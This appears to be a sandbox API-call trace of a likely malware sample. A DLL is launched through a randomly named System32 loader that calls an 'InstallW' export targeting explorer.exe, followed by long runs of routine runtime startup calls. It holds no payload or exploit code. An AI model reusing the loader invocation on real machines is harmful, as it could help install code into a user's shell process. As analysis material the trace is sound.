[0035.485] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.485] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.485] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.485] GetCurrentThreadId () returned 0xd34 [0035.485] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"explorer.exe\"" [0035.485] GetEnvironmentStringsW () returned 0x3178f0* [0035.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13609f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.485] FreeEnvironmentStringsW (penv=0x3178f0) returned 1 [0035.485] GetStartupInfoA (in: lpStartupInfo=0x16f5bc | out: lpStartupInfo=0x16f5bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.485] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.485] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.485] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.485] SetHandleCount (uNumber=0x20) returned 0x20 [0035.486] GetLastError () returned 0x0 [0035.486] SetLastError (dwErrCode=0x0) [0035.486] GetLastError () returned 0x0 [0035.486] SetLastError (dwErrCode=0x0) [0035.486] GetLastError () returned 0x0 [0035.486] SetLastError (dwErrCode=0x0) [0035.486] GetACP () returned 0x4e4 [0035.486] GetLastError () returned 0x0 [0035.486] SetLastError (dwErrCode=0x0) [0035.486] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.486] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f59c | out: lpCPInfo=0x16f59c) returned 1 [0035.486] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f068 | out: lpCPInfo=0x16f068) returned 1 [0035.486] GetLastError () returned 0x0 [0035.486] SetLastError (dwErrCode=0x0) [0035.486] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x16eff8 | out: lpCharType=0x16eff8) returned 1 [0035.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f47c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f47c, cbMultiByte=256, lpWideCharStr=0x16ede8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0035.486] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x16f07c | out: lpCharType=0x16f07c) returned 1 [0035.486] GetLastError () returned 0x0 [0035.486] SetLastError (dwErrCode=0x0) [0035.486] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f47c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f47c, cbMultiByte=256, lpWideCharStr=0x16edb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.486] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.486] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x16eba8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x16f37c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿIÌVô´õ\x16", lpUsedDefaultChar=0x0) returned 256 [0035.486] GetLastError () returned 0x0 [0035.486] SetLastError (dwErrCode=0x0) [0035.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f47c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.486] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f47c, cbMultiByte=256, lpWideCharStr=0x16edd8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.486] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.486] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x16ebc8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0035.486] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x16f27c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿIÌVô´õ\x16", lpUsedDefaultChar=0x0) returned 256 [0035.487] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.487] SetLastError (dwErrCode=0x0) [0035.487] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.488] SetLastError (dwErrCode=0x0) [0035.488] GetLastError () returned 0x0 [0035.489] SetLastError (dwErrCode=0x0) [0035.489] GetLastError () returned 0x0 [0035.489] SetLastError (dwErrCode=0x0) [0035.489] GetLastError () returned 0x0 [0035.489] SetLastError (dwErrCode=0x0) [0035.489] GetLastError () returned 0x0 [0035.489] SetLastError (dwErrCode=0x0) [0035.489] GetLastError () returned 0x0 [0035.489] SetLastError (dwErrCode=0x0) [0035.489] GetLastError () returned 0x0 [0035.489] SetLastError (dwErrCode=0x0) [0035.489] GetLastError () returned 0x0 [0035.489] SetLastError (dwErrCode=0x0) [0035.495] GetLastError () returned 0x0 [0035.495] SetLastError (dwErrCode=0x0) [0035.495] GetLastError () returned 0x0 [0035.495] SetLastError (dwErrCode=0x0) [0035.495] GetLastError () returned 0x0 [0035.495] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.496] GetLastError () returned 0x0 [0035.496] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.497] GetLastError () returned 0x0 [0035.497] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.498] SetLastError (dwErrCode=0x0) [0035.498] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.499] GetLastError () returned 0x0 [0035.499] SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] SetLastError (dwErrCode=0x0) [0035.500] GetLastError () returned 0x0 [0035.500] 